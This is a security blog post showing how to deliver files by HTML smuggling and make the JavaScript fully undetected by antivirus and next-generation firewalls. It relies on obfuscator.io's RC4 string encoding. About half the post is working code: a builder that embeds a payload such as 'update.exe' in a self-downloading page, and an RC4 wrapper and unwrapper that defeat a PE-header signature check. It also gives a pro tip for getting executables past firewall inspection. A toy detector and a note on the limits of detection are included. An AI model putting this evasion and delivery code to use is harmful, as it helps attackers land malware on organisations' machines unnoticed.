This information is provided exclusively for the purposes of legitimate penetration testing, education, and further security research. The only way to improve security is by testing it. It's only once we acknowledge a problem (e.g. in a security solution) that we can take steps towards fixing it. Being aware of a potential false sense of security is equally important.
In today's short article, we will be covering how to make a JavaScript payload fully undetectable (FUD) on VirusTotal, at least at the time of writing.
This simple technique works great, even a little too well, for evading signature-based detection of the output of any offensive security tool that emits JavaScript.
Perfect use case: HTML Smuggling
File inspection with the goal of blocking or detecting EXEs, scripts, and other downloads is a common feature of the next-generation firewalls (NGFWs) that enterprises widely deploy. To get around this control, attackers commonly use a technique known as HTML smuggling. It works by embedding the malicious file inside JavaScript as an encoded string (for example base64), which the target's browser downloads as ordinary text and then decodes, client-side, into the final payload. Only HTML and JavaScript ever cross the wire, so a device inspecting downloads never sees a file. The target simply sees that a file is being downloaded and is none the wiser about the sneaky way in which it was delivered.

Image courtesy Microsoft Threat Intelligence.
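To make the mechanics concrete, here is an added example of the HTML smuggling flow described above. It is constructed illustration code, not EmbedInHTML or any other project's code; the file name, the MIME type and the sample payload are assumptions.

```javascript
// Added example of HTML smuggling mechanics. Constructed for illustration; not
// EmbedInHTML's or any other project's code. File name, MIME type and sample
// payload are assumptions.

// Base64 helpers that work in browsers (atob/btoa) and in Node (Buffer fallback).
function bytesToB64(bytes) {
  if (typeof btoa === "function") return btoa(String.fromCharCode(...bytes));
  return Buffer.from(bytes).toString("base64");
}
function b64ToBytes(b64) {
  const bin = typeof atob === "function" ? atob(b64) : Buffer.from(b64, "base64").toString("binary");
  const out = new Uint8Array(bin.length);
  for (let i = 0; i < bin.length; i++) out[i] = bin.charCodeAt(i);
  return out;
}

// Victim-side routine: rebuild the file from the embedded string and trigger a
// download. It is serialised into the page with .toString(), so it stays self-contained.
function smuggledDownload(fileName, b64) {
  const bin = atob(b64);
  const bytes = new Uint8Array(bin.length);
  for (let i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
  const blob = new Blob([bytes], { type: "application/octet-stream" });
  const url = URL.createObjectURL(blob);
  const a = document.createElement("a");
  a.href = url;
  a.download = fileName;   // the download attribute names the file on disk
  document.body.appendChild(a);
  a.click();               // synthetic click starts the "download" from memory
  a.remove();
  URL.revokeObjectURL(url);
}

// Attacker side: wrap the payload in a page. Only text crosses the wire; the file
// exists only after the browser has decoded the string.
function buildSmugglingPage(fileName, payloadBytes) {
  const b64 = bytesToB64(payloadBytes);
  return [
    "<!doctype html>",
    "<html><body><p>Your download will begin shortly.</p>",
    "<script>",
    `(${smuggledDownload.toString()})(${JSON.stringify(fileName)}, ${JSON.stringify(b64)});`,
    "</script>",
    "</body></html>",
  ].join("\n");
}

// What an inspecting proxy would have to do to see the file at all: locate the
// literal in the script and decode it.
function extractSmuggledPayload(pageHtml) {
  const m = pageHtml.match(/\(\s*"([^"]+)"\s*,\s*"([A-Za-z0-9+\/=]+)"\s*\)/);
  return m ? { fileName: m[1], bytes: b64ToBytes(m[2]) } : null;
}

// Constructed stand-in for a binary payload (not a real executable).
const SAMPLE_PAYLOAD = new TextEncoder().encode("constructed stand-in for a binary payload");
const SAMPLE_PAGE = buildSmugglingPage("update.exe", SAMPLE_PAYLOAD);
console.log(SAMPLE_PAGE);
```

Running the script under Node prints the page; opening the printed HTML in a browser triggers the download of `update.exe`. Note that the plaintext of the payload never appears in the page, only its base64, which is exactly what the signatures discussed next have to key on.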
Email attachments from sources external to an organization are often stripped. This is why a link in the email to an attacker-controlled website is usually what delivers a payload in the first place. Most large email providers like Gmail or Outlook also block attachments with dangerous extensions outright.
Naturally, defenders created signatures for these HTML smuggling JavaScript tools so they could be detected over the network (as opposed to the final payloads themselves):

Above are the detections of one such HTML smuggling project: EmbedInHTML. In practice, an NGFW's detection rate for this type of payload would be much higher; the antivirus engines on VirusTotal aren't as geared towards detecting this type of threat. Even so, we have plenty of unwanted detections.
Flying under the radar...
So, the defenders made a move. Now it's the attacker's turn: How might an attacker become fully undetectable (at least... for now)?
Simple, just paste your payload into obfuscator.io then click the "Obfuscate" button!
Pro tip: If you're HTML smuggling a binary file (like an EXE or DLL) then definitely make sure to select the RC4 encryption option under String Array Encoding. This is necessary to remove the last bits of data that an NGFW can signature on. With plain base64, the embedded executable's structure survives in a recognisable form: the MZ magic number and the rest of the PE/COFF headers encode deterministically (a standard DOS stub base64-encodes to a string beginning with "TVqQ"), and detecting the structure of an executable inside JavaScript is a very strong heuristic that NGFWs will not let pass. Encrypting the string array breaks that pattern, because the encoded text no longer has any fixed relationship to the bytes of the file.
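The following added example shows, in code, why the pro tip matters. It is constructed for this page and is not obfuscator.io's implementation of its String Array Encoding option; the fake PE bytes, the RC4 key and the scanner heuristic are all assumptions. It generalises the point a little: rather than matching the "TVqQ" prefix, the toy scanner decodes every base64-looking run and checks the decoded bytes for an MZ header whose e_lfanew points at a "PE\0\0" signature, which is closer to what a structure-aware inspection engine does.

```javascript
// Added example, constructed for this page; not obfuscator.io's code. Shows that a
// base64 blob of an executable is trivially recognisable after decoding, and that
// RC4-encrypting the string literal removes that signal while remaining reversible.

function bytesToB64(bytes) {
  if (typeof btoa === "function") return btoa(String.fromCharCode(...bytes));
  return Buffer.from(bytes).toString("base64");
}
function b64ToBytes(b64) {
  const bin = typeof atob === "function" ? atob(b64) : Buffer.from(b64, "base64").toString("binary");
  const out = new Uint8Array(bin.length);
  for (let i = 0; i < bin.length; i++) out[i] = bin.charCodeAt(i);
  return out;
}

// Constructed minimal PE-shaped payload (assumption, not a real executable):
// DOS "MZ" magic at 0, e_lfanew at 0x3C pointing to a "PE\0\0" signature at 0x40.
function buildFakePe() {
  const pe = new Uint8Array(0x48);
  pe[0] = 0x4d; pe[1] = 0x5a;
  pe[0x3c] = 0x40;
  pe.set([0x50, 0x45, 0x00, 0x00], 0x40);
  return pe;
}

// Toy NGFW-style heuristic: "MZ" header whose e_lfanew (little-endian u32 at 0x3C)
// lands on a "PE\0\0" signature.
function looksLikePe(bytes) {
  if (bytes.length < 0x40 || bytes[0] !== 0x4d || bytes[1] !== 0x5a) return false;
  const lfanew = (bytes[0x3c] | (bytes[0x3d] << 8) | (bytes[0x3e] << 16) | (bytes[0x3f] << 24)) >>> 0;
  return lfanew + 4 <= bytes.length &&
    bytes[lfanew] === 0x50 && bytes[lfanew + 1] === 0x45 &&
    bytes[lfanew + 2] === 0x00 && bytes[lfanew + 3] === 0x00;
}

// Scan a script: decode every base64-looking run and test it for a PE header.
function scriptCarriesPe(js) {
  const runs = js.match(/[A-Za-z0-9+\/]{32,}={0,2}/g) || [];
  return runs.some((run) => {
    try { return looksLikePe(b64ToBytes(run)); } catch (e) { return false; }
  });
}

// Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation.
function rc4(key, data) {
  const S = new Uint8Array(256);
  for (let i = 0; i < 256; i++) S[i] = i;
  for (let i = 0, j = 0; i < 256; i++) {
    j = (j + S[i] + key[i % key.length]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
  }
  const out = new Uint8Array(data.length);
  for (let k = 0, i = 0, j = 0; k < data.length; k++) {
    i = (i + 1) & 0xff;
    j = (j + S[i]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
    out[k] = data[k] ^ S[(S[i] + S[j]) & 0xff];
  }
  return out;
}

// Plain smuggling: the base64 of the file sits in the script as-is.
function buildPlainScript(payload) {
  return `var payload = "${bytesToB64(payload)}";`;
}

// The RC4 string-array idea: encrypt the base64 *text* with RC4, then base64 the
// ciphertext so it is still a printable literal. The key lives in the script too;
// this hides structure from signatures, it is not confidentiality.
function buildRc4Script(payload, key) {
  const ct = rc4(key, new TextEncoder().encode(bytesToB64(payload)));
  return `var wrapped = "${bytesToB64(ct)}";`;
}

// Victim side: peel both layers to get the original bytes back.
function unwrapRc4Script(js, key) {
  const wrapped = js.match(/"([A-Za-z0-9+\/=]+)"/)[1];
  const innerB64 = new TextDecoder().decode(rc4(key, b64ToBytes(wrapped)));
  return b64ToBytes(innerB64);
}

const DEMO_KEY = new TextEncoder().encode("demo-key"); // constructed key (assumption)
console.log("plain flagged:", scriptCarriesPe(buildPlainScript(buildFakePe())));
console.log("rc4 flagged:  ", scriptCarriesPe(buildRc4Script(buildFakePe(), DEMO_KEY)));
```

The decoder that a real smuggling page ships is, of course, also visible in the script, so a detection that actually executes or emulates the JavaScript (or simply keys on the obfuscator's own decoder boilerplate) would still catch this. The example only demonstrates why static signatures on the encoded file body stop working.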

One might think that obfuscating JavaScript in this way would be a huge red flag to NGFWs and other detection software. This would be true in almost any other case like with extensive PowerShell obfuscation or packers for binaries (e.g. antiviruses tend to hate the UPX packer). However, in the world of JavaScript it's very normal to see heavily minified and sometimes obfuscated scripts to keep file sizes as low as possible for the web and possibly to protect proprietary code. This makes blending in with the vast quantities of those already existing legitimate scripts a very successful strategy.
Response (UPDATE)
Florian Roth (@cyb3rops), a well-known detection engineer in the security space, acknowledged this hole in detection two days after this post went live.
Okay, I just checked and so far we have posted 96,387,836 comments on @Virustotal
- Florian Roth (@cyb3rops) August 17, 2023
( and we have deactivated some very good but very noisy rules, e.g. for JavaScript obfuscation, which would have triggered on this sample https://t.co/3niDn2OQLf ) pic.twitter.com/3eos9Gyv1a
A few years ago, when I first came across this method for evading detection, the original output from obfuscator.io did indeed get caught by VirusTotal. However, after applying my "pro tip" the sample was fully undetected.
Trying this method out again today, I wondered why my sample was fully undetected by VirusTotal even without my "pro tip". After all, detection is supposed to get better over time, not worse! I'm glad to have this question answered now.
It's my hope that Florian Roth and other engineers can improve the state of JavaScript detection to better protect organizations from compromise.
Detection software (such as antivirus, endpoint detection and response, and next-generation firewalls) should only be used as part of a more holistic defense-in-depth security strategy. This is primarily because security through detection is a cat-and-mouse game. If 'real' security is what you want then have a look at my binary exploitation or Qubes OS content (upcoming).